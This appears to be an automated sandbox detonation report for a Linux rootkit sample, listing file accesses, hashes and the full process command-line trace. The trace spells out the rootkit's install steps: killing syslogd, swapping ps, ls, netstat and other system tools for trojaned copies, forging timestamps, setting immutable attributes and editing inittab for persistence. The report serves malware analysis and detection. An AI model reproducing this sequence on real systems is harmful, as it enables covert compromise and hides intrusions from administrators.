File opened for reading /proc/799/stat /bin/pidof N/A
File opened for reading /proc/708/stat /bin/ps N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/146/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/496/stat /usr/bin/killall N/A
File opened for reading /proc/371/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/913/stat /bin/ps N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/223/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /bin/ps N/A
File opened for reading /proc/483/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/483/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /bin/pidof N/A
File opened for reading /proc/146/stat /bin/pidof N/A
File opened for reading /proc/312/status /bin/ps N/A
File opened for reading /proc/345/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /bin/pidof N/A
File opened for reading /proc/75/stat /bin/ps N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/372/cmdline /bin/pidof N/A
File opened for reading /proc/496/stat /usr/bin/killall N/A
File opened for reading /proc/114/cmdline /usr/bin/killall N/A
File opened for reading /proc/705/stat /usr/bin/killall N/A
File opened for reading /proc/78/cmdline /bin/pidof N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/bin/.sh/sshd_config /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/conf/hosts.h /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init1 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init2 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.shmd5 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.procs /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.stats /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/info_tmp /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Processes

/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

/usr/bin/whoami

[whoami]

/bin/tar

[tar zxf ./bin.tgz]

/bin/tar

[tar zxf ./conf.tgz]

/bin/tar

[tar zxf ./lib.tgz]

/bin/tar

[tar zxf ./utilz.tgz]

/bin/tar

[tar zxf ./sshd.tgz]

/bin/rm

[rm -rf ./sshd.tgz]

/bin/rm

[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]

/bin/sleep

[sleep 2]

/usr/bin/killall

[killall -9 syslogd]

/bin/date

[date +%S]

/bin/sleep

[sleep 2]

/bin/hostname

[hostname -f]

/bin/grep

[grep -v ^$]

/bin/grep

[grep -v ^# /etc/syslog.conf]

/bin/grep

[grep @]

/usr/bin/cut

[cut -d @ -f 2]

/bin/uname

[uname -n]

/bin/mv

[mv lib/libproc.a /lib/]

/bin/mv

[mv lib/libproc.so.2.0.6 /lib/]

/sbin/ldconfig

[/sbin/ldconfig]

/usr/bin/md5sum

[md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /etc/sh.conf]

/bin/chown

[chown -f root:root /etc/sh.conf]

/usr/bin/chattr

[chattr +isa /etc/sh.conf]

/bin/rm

[rm -rf /tmp/bin/.sh/shdcf2]

/bin/mv

[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]

/bin/mv

[mv /tmp/conf/lidps1.so /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/conf/*]

/bin/mv

[mv /tmp/conf/* /usr/include/]

/bin/mkdir

[mkdir /lib/libsh.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/libsh.so]

/bin/mkdir

[mkdir /usr/lib/libsh]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh]

/bin/mv

[mv .sh/* /lib/libsh.so/]

/bin/mv

[mv .sh/.bashrc /usr/lib/libsh]

/bin/mv

[mv /lib/libsh.so/sshd /sbin/ttyload]

/bin/chmod

[chmod a+xr /sbin/ttyload]

/bin/chmod

[chmod o-w /sbin/ttyload]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttyload]

/usr/bin/chattr

[chattr +isa /sbin/ttyload]

/bin/pidof

[pidof ttyload]

/bin/mv

[mv /tmp/bin/ttymon /sbin/ttymon]

/bin/chmod

[chmod a+xr /sbin/ttymon]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttymon]

/usr/bin/chattr

[chattr +isa /sbin/ttymon]

/bin/pidof

[pidof ttymon]

/bin/cp

[cp /bin/bash /lib/libsh.so]

/usr/bin/chattr

[chattr -isa /etc/inittab]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v ttyload]

/bin/grep

[grep -v getty]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep getty]

/bin/cat

[cat /tmp/.init2]

/usr/bin/touch

[touch -acmr /bin/ls /usr/sbin/ttyload]

/bin/chmod

[chmod +x /usr/sbin/ttyload]

/usr/bin/chattr

[chattr +isa /usr/sbin/ttyload]

/usr/sbin/ttyload

[/usr/sbin/ttyload]

/sbin/ttyload

[/sbin/ttyload -q]

/sbin/ttymon

[/sbin/ttymon]

/usr/bin/touch

[touch -amcr /etc/inittab /tmp/.init1]

/bin/mv

[mv -f /tmp/.init1 /etc/inittab]

/bin/rm

[rm -rf /tmp/.init2]

/bin/grep

[grep ttyload /etc/inittab]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ps]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ls]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/find]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/top]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/md5sum]

/tmp/encrypt

[./encrypt -e .shmd5 /dev/srd0]

/usr/bin/touch

[touch -acmr /bin/ls /dev/srd0]

/usr/bin/chattr

[chattr a+r /dev/srd0]

/bin/chown

[chown -f root:root /dev/srd0]

/bin/rm

[rm -rf .shmd5]

/usr/bin/touch

[touch -acmr /sbin/ifconfig ifconfig]

/usr/bin/touch

[touch -acmr /bin/ps ps]

/usr/bin/touch

[touch -acmr /bin/ls ls]

/usr/bin/touch

[touch -acmr /bin/netstat netstat]

/usr/bin/touch

[touch -acmr /usr/bin/find find]

/usr/bin/touch

[touch -acmr /usr/bin/top top]

/usr/bin/touch

[touch -acmr /usr/sbin/lsof lsof]

/usr/bin/touch

[touch -acmr /sbin/syslogd syslogd]

/usr/bin/touch

[touch -acmr /usr/bin/slocate slocate]

/usr/bin/touch

[touch -acmr /usr/bin/dir dir]

/usr/bin/touch

[touch -acmr /usr/bin/md5sum md5sum]

/usr/bin/touch

[touch -acmr /usr/bin/pstree pstree]

/bin/mkdir

[mkdir /usr/lib/libsh/.backup]

/usr/bin/chattr

[chattr -isa /bin/ps]

/bin/cp

[cp /bin/ps /usr/lib/libsh/.backup]

/bin/mv

[mv -f ps /bin/ps]

/usr/bin/chattr

[chattr +isa /bin/ps]

/usr/bin/chattr

[chattr -isa /sbin/ifconfig]

/bin/cp

[cp /sbin/ifconfig /usr/lib/libsh/.backup]

/bin/mv

[mv -f ifconfig /sbin/ifconfig]

/usr/bin/chattr

[chattr +isa /sbin/ifconfig]

/usr/bin/chattr

[chattr -isa /bin/netstat]

/bin/cp

[cp /bin/netstat /usr/lib/libsh/.backup]

/bin/mv

[mv -f netstat /bin/netstat]

/usr/bin/chattr

[chattr +isa /bin/netstat]

/usr/bin/chattr

[chattr -isa /usr/bin/top]

/bin/cp

[cp /usr/bin/top /usr/lib/libsh/.backup]

/bin/mv

[mv -f top /usr/bin/top]

/usr/bin/chattr

[chattr +isa /usr/bin/top]

/usr/bin/chattr

[chattr -isa /bin/ls]

/bin/cp

[cp /bin/ls /usr/lib/libsh/.backup]

/bin/mv

[mv -f ls /bin/ls]

/usr/bin/chattr

[chattr +isa /bin/ls]

/usr/bin/chattr

[chattr -isa /usr/bin/find]

/bin/cp

[cp /usr/bin/find /usr/lib/libsh/.backup]

/bin/mv

[mv -f find /usr/bin/find]

/usr/bin/chattr

[chattr +isa /usr/bin/find]

/usr/bin/chattr

[chattr -isa /usr/bin/pstree]

/bin/cp

[cp /usr/bin/pstree /usr/lib/libsh/.backup]

/bin/mv

[mv -f pstree /usr/bin/pstree]

/usr/bin/chattr

[chattr +isa /usr/bin/pstree]

/usr/bin/chattr

[chattr -isa /usr/bin/md5sum]

/bin/cp

[cp /usr/bin/md5sum /usr/lib/libsh/.backup]

/bin/mv

[mv -f md5sum /usr/bin/md5sum]

/usr/bin/chattr

[chattr +isa /usr/bin/md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz/*]

/bin/mv

[mv /tmp/utilz /usr/lib/libsh/]

/bin/mkdir

[mkdir /usr/lib/libsh/.sniff]

/bin/mv

[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]

/bin/mv

[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]

/bin/mv

[mv /tmp/bin/shsb /usr/lib/libsh/shsb]

/bin/mv

[mv /tmp/bin/hide /usr/lib/libsh/hide]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/shsb]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/hide]

/bin/chmod

[chmod +x /usr/lib/libsh/.sniff/*]

/bin/chmod

[chmod +x /usr/lib/libsh/shsb]

/bin/chmod

[chmod +x /usr/lib/libsh/hide]

/bin/ps

[ps aux]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep named]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep smbd]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep rpc.statd]

/bin/rm

[rm -rf /tmp/.procs]

/bin/cat

[cat /tmp/.stats]

/bin/grep

[grep 443]

/bin/grep

[grep http]

/bin/rm

[rm -rf /tmp/.stats]

/bin/mkdir

[mkdir /usr/lib/libsh/.owned]

/usr/bin/chattr

[chattr +isa /usr/lib/libsh]

/usr/bin/chattr

[chattr +isa /lib/libsh.so]

/usr/bin/killall

[killall -9 -q nscd]

/usr/bin/killall

[killall -9 -q xntps]

/usr/bin/killall

[killall -9 -q mountd]

/usr/bin/killall

[killall -9 -q mserv]

/usr/bin/killall

[killall -9 -q psybnc]

/usr/bin/killall

[killall -9 -q t0rns]

/usr/bin/killall

[killall -9 -q linsniffer]

/usr/bin/killall

[killall -9 -q sniffer]

/usr/bin/killall

[killall -9 -q lpsched]

/usr/bin/killall

[killall -9 -q sniff]

/usr/bin/killall

[killall -9 -q sn1f]

/usr/bin/killall

[killall -9 -q sshd2]

/usr/bin/killall

[killall -9 -q xsf]

/usr/bin/killall

[killall -9 -q xchk]

/usr/bin/killall

[killall -9 -q ssh2d]

/sbin/ifconfig

[/sbin/ifconfig eth0]

/bin/grep

[grep inet addr:]

/usr/bin/awk

[awk -F {print $2} ]

/usr/bin/cut

[cut -c6-]

/bin/hostname

[hostname -f]

/bin/uname

[uname -a]

/usr/bin/awk

[awk { print $11 }]

/bin/cat

[cat /tmp/info_tmp]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/usr/bin/awk

[awk {print $3}]

/bin/hostname

[hostname -i]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep eth]

/usr/bin/wc

[wc -l]

/usr/bin/head

[head -1 /etc/debian_version]

/bin/rm

[rm -rf /tmp/info_tmp]

/bin/date

[date +%S]

/usr/bin/expr

[expr 20 - 21]

/sbin/iptables

[/sbin/iptables -L input]

/usr/bin/head

[head -5]

/sbin/syslogd

[/sbin/syslogd -m 0]

/bin/rm

[rm -rf ../shv5*]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp

Files

/var/cache/ldconfig/aux-cache~

MD5 1a71e452a82883488b050dedec78788d
SHA1 7991d8edff285450d0ebd0bbb7ad5d4f79f803e5
SHA256 ded190ca15a72591016d81b5405351ac765504cae0a578bdb4538ca3fc7239cd
SHA512 cb3c8bae1d229e75201b9d2872a4ceaffdca54cf4da11eb6b50aac80219b037da58c264e9a4a511b8682d5e9987b33129bc495ab8ec0e92002c174180afa09a5

/lib/libsh.so/bash

MD5 59d4ddd8dafe5d32d364d3f079f9d047
SHA1 123c130531cd265e7a4ed43ac71ea9b280ccf15c
SHA256 0df0983446a29ee4a99d696871c53ff5346a282fdddb85779cd1ccb338bc18d2
SHA512 433fb7514c3ea8eba49980a97004e19d104643a93df08fb28d9e6886c2ccf845b894b3dd7e42dccfa493b4f8d58dfa2056677e370dcba10096fe886c3d0545a9

/tmp/.init1

MD5 ba6ed6a3d425270d5374b0c2b54b3008
SHA1 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec
SHA256 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359
SHA512 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c

/tmp/.init1

MD5 0dae4739f83623a59236ecfabe00007b
SHA1 4b2b361ba9cf76213d2c4d6ba67e80099405f810
SHA256 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0
SHA512 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74

/tmp/.init1

MD5 21df30feebe94d25ce99e861e3642895
SHA1 3624439d7e9ac4463f83f1658205367ef27a2234
SHA256 d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5
SHA512 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb

/tmp/.init1

MD5 74e8461d4c9dd715082f15ef51e3ecac
SHA1 0504be0510ac79c4f7c8d5477032408f9b63a651
SHA256 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de
SHA512 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c

/tmp/.init1

MD5 8c053b4b674ebfcf6d38503608c5c8db
SHA1 9927d232e5bb15e3b6bbe461e0041d74649b963a
SHA256 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc
SHA512 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222

/usr/sbin/ttyload

MD5 b46702355aecfc0bd14c525655eccb8b
SHA1 85ae2258fdf63f04130470356e4d0ba13cce49b4
SHA256 d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7
SHA512 db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151

/usr/sbin/ttyload

MD5 53e75bf7964b0fb15cbe3028a151ed65
SHA1 116589e3b65166f73be2c6e8bb3b09c07641a762
SHA256 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805
SHA512 ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316

/tmp/.shmd5

MD5 a142966484e4fa766d5b0ba009adcc4d
SHA1 475312960c96053dbdcea844bd924270fa4d0d92
SHA256 23754f3d7f436e41822bfdf2c84a1b26d9648fd63c00a051dadcb1add8cc8d38
SHA512 4302144590ca1e72d10aea3737d868dfb3900325cc723bd5569c7c06d97d625522064944dbf24600a019466919c210a605a9669793951102d473b3167b30ef7f

/tmp/.shmd5

MD5 7219d79f78b22bb838fa3aa91df8f1b5
SHA1 d9f1e8979927bbbe01e6a81c1461b80d7d1e5dd9
SHA256 72cd95262c9e840adacfd9b26841774bf1ccf108bd8bf90959014dca47e1826c
SHA512 02acd3630e7aefbae724564145a4367d9312c37e7f51d35c05b41dc8c92e7dd121fa0baaa02308a83471c57a2355e9e5e2c5c8fd1ab8951c7b64f03c22ca00cd

/tmp/.shmd5

MD5 0da64e6935b4052896bed0234ccf0638
SHA1 0cbe4411c422da3e6b067ab9cbe8cad571c394f4
SHA256 b403c409b13822ee1a3de6bd2c77d211045bf9ac27c9cc8ee8c7435afa06d726
SHA512 02f9e94f46f99d79b17a3c603884cdc1a4210086591f3f0257fadba25b85c54d3ae31644d4d7b1b6a6f8200cd26ce47a9e89b2c8a4a9e2c8ec1e3d24b0c2218c

/tmp/.shmd5

MD5 3d8093ee63635cb0f62b6609a59468a3
SHA1 2ee12c85b4e0766268ef92f6dbeb12f74efa3a8a
SHA256 b8acb3c4f4cb02911febe0342ccc8d152f025ce95c2c7bc9640482cf297e50e4
SHA512 eae2d20f56ed699500a7ad0913ab9280ef43ce855bdab04db9c50562323867269b56d8b3d6b29d87b6e60557d08927f2aea7cce69f701b1c2699fcbe1f40efde

/tmp/.shmd5

MD5 c33172192a05f176033f7ef4fb6366aa
SHA1 44303d41fca5a06a360efa3ad384257d22118a62
SHA256 403c3d73839b70e99a88f9d7005ad80685e3c54a020822d9ef9d3b3b8a7003ea
SHA512 74cb4265d0ccbb06f61e64219002608fa6925235cf630dab81a0cb8cd233180f692557a0bd8ffd72f9b2f9700c11794a19cfadf8dfabd4e200120d7ae4c5dd4c

/usr/lib/libsh/.backup/ps

MD5 69a3710ded58f73be52a7044f657fd3c
SHA1 4fed31f8fb6e45a85991047817f071f4679f5e4a
SHA256 3228f37325fbea367ee9c696f5d70b35e5039fca394b0710a250462cbadb7ce0
SHA512 4564394a034eced894e72259ec86a52e1b5727bd00a48e3e36e3a507e5ecc20d1091360da3bd3890d4a9ed9f610251406b3c2a792be27083ce5ebf4937ed46d6

/usr/lib/libsh/.backup/top

MD5 e7d7268ac21b933b811affa4085a6d16
SHA1 fdd45ceec126ca49ce7bc30901cc21f1ec5ee59b
SHA256 bc18d4c41b35f4b1f7e85b3c76a4dd00fd1b862ce07b7ed5fc3a6a97cde039ee
SHA512 be56a771991a1d99a21560b496846cff9eb54a1036adfdaa0a37bbfe9adc148e2ca425ba9092d4d4e2a2323affe1dded974479d82fdd0c58cddb9e27868cf008

/usr/lib/libsh/.backup/ls

MD5 26a61638b9adcf33bdf75aaf905f183f
SHA1 4447e881c94f6054d602099e504fadf13e32ba2e
SHA256 c9fec147777ddab82f8e5ed3b4d8181686c291440cef7aa0d9336ab88d35fde9
SHA512 db8f7b10bad548923974d91f3407a831802ce5595648f55af06e923fd7d1980f100bab85d6e088dd0f2adf98c63ffab42c590e733790fa37c9010dd6951fedcf

/usr/lib/libsh/.backup/find

MD5 97b5c6c1b307114efc38193175a343c3
SHA1 24015d4f95c6878ea5027c134eddebb7126b610f
SHA256 b1a89f313023b476fc826d8fac689679504e61ae8e650681fb966e810ed34970
SHA512 e5359f3e082f54f5cfd7afa7771d8724d161d48d09372f203bdca222a47a63919fdfb76b6db7fb8ff61e92f8fd04fdec962e94331ff12705cf53ce5e23d33180

/usr/lib/libsh/.backup/pstree

MD5 b50f49b8ce8dc659e3fc303e58194d98
SHA1 e7ecfedde9c843eac59b78c52cbdf887f41c0148
SHA256 10ff5e8257ca77c4543eed2324ff264d178ae0ce20c3aa00a36e7d45d636d777
SHA512 9c8db125ba78f382811d7e6f7c6cb304a35ec97875b555c05179c906e153ef2c743205cdc1a6a1faf0a970dc15a7dd0bc2c7b3ef4711f4e83d7f1878d21f39c9

/usr/lib/libsh/.backup/md5sum

MD5 bc2ae3c09ce773bfb3e92d2bf8ede6ea
SHA1 6a590a62de47e308ec4bd0fbbc6b77e22b9cfd61
SHA256 984b34e82702c1e1c967050f684d0ada601215451fa68ff6629e9e8df7258172
SHA512 dcab4048eafc622f5be0cc0b28e95ccf7e2a8033b22dd996f01352fd437a4a8424d79816e6f88bee7fcbd7f78ee66145381acbd89d7f3fe4b9416b386283678c

/tmp/.procs

MD5 667258594d37069bc1f95b03bdb26077
SHA1 0eba2ec0d782a02c19d073fa19e3f9236da34317
SHA256 53df39dec9e2c3b170355ccc3b9cd4ecda72370fa77a1147eeb66a57617e141d
SHA512 aa1fd900136effd8a8d2bb20933948fdfb988feb7da34a5ab8072ad3a871a25bb318364e8fefa8025818195ab27a31c55cd1081249c09611c94311c0c33eede9

/tmp/info_tmp

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-15 23:17

Reported

2024-07-15 23:19

Platform

debian9-mipsel-20240611-en

Max time kernel

39s

Max time network

40s

Command Line

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /usr/sbin/ttyload /usr/sbin/ttyload N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/hostname N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/sbin/ttyload /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/801/cmdline /bin/pidof N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/154/cmdline /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/681/stat /usr/bin/killall N/A
File opened for reading /proc/857/cmdline /usr/bin/killall N/A
File opened for reading /proc/713/stat /bin/ps N/A
File opened for reading /proc/669/stat /bin/pidof N/A
File opened for reading /proc/232/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/339/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /bin/pidof N/A
File opened for reading /proc/857/cmdline /bin/ps N/A
File opened for reading /proc/334/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/22/cmdline /bin/ps N/A
File opened for reading /proc/339/stat /bin/ps N/A
File opened for reading /proc/331/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/331/stat /bin/ps N/A
File opened for reading /proc/15/stat /bin/ps N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /bin/pidof N/A
File opened for reading /proc/73/stat /bin/pidof N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/435/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /bin/pidof N/A
File opened for reading /proc/383/stat /usr/bin/killall N/A
File opened for reading /proc/435/stat /usr/bin/killall N/A
File opened for reading /proc/886/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/811/stat /bin/pidof N/A
File opened for reading /proc/332/cmdline /bin/ps N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/703/cmdline /bin/pidof N/A
File opened for reading /proc/177/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/6/cmdline /bin/pidof N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /bin/pidof N/A
File opened for reading /proc/36/stat /bin/pidof N/A
File opened for reading /proc/337/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/711/cmdline /bin/ps N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/710/stat /bin/ps N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/2/stat /bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/info_tmp /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/bin/.sh/sshd_config /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/conf/hosts.h /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init1 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init2 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.shmd5 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.procs /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.stats /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Processes

/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

/usr/bin/whoami

[whoami]

/bin/tar

[tar zxf ./bin.tgz]

/bin/tar

[tar zxf ./conf.tgz]

/bin/tar

[tar zxf ./lib.tgz]

/bin/tar

[tar zxf ./utilz.tgz]

/bin/tar

[tar zxf ./sshd.tgz]

/bin/rm

[rm -rf ./sshd.tgz]

/bin/rm

[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]

/bin/sleep

[sleep 2]

/usr/bin/killall

[killall -9 syslogd]

/bin/date

[date +%S]

/bin/sleep

[sleep 2]

/bin/hostname

[hostname -f]

/bin/grep

[grep -v ^# /etc/syslog.conf]

/bin/grep

[grep -v ^$]

/bin/grep

[grep @]

/usr/bin/cut

[cut -d @ -f 2]

/bin/uname

[uname -n]

/bin/mv

[mv lib/libproc.a /lib/]

/bin/mv

[mv lib/libproc.so.2.0.6 /lib/]

/sbin/ldconfig

[/sbin/ldconfig]

/usr/bin/md5sum

[md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /etc/sh.conf]

/bin/chown

[chown -f root:root /etc/sh.conf]

/usr/bin/chattr

[chattr +isa /etc/sh.conf]

/bin/rm

[rm -rf /tmp/bin/.sh/shdcf2]

/bin/mv

[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]

/bin/mv

[mv /tmp/conf/lidps1.so /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/conf/*]

/bin/mv

[mv /tmp/conf/* /usr/include/]

/bin/mkdir

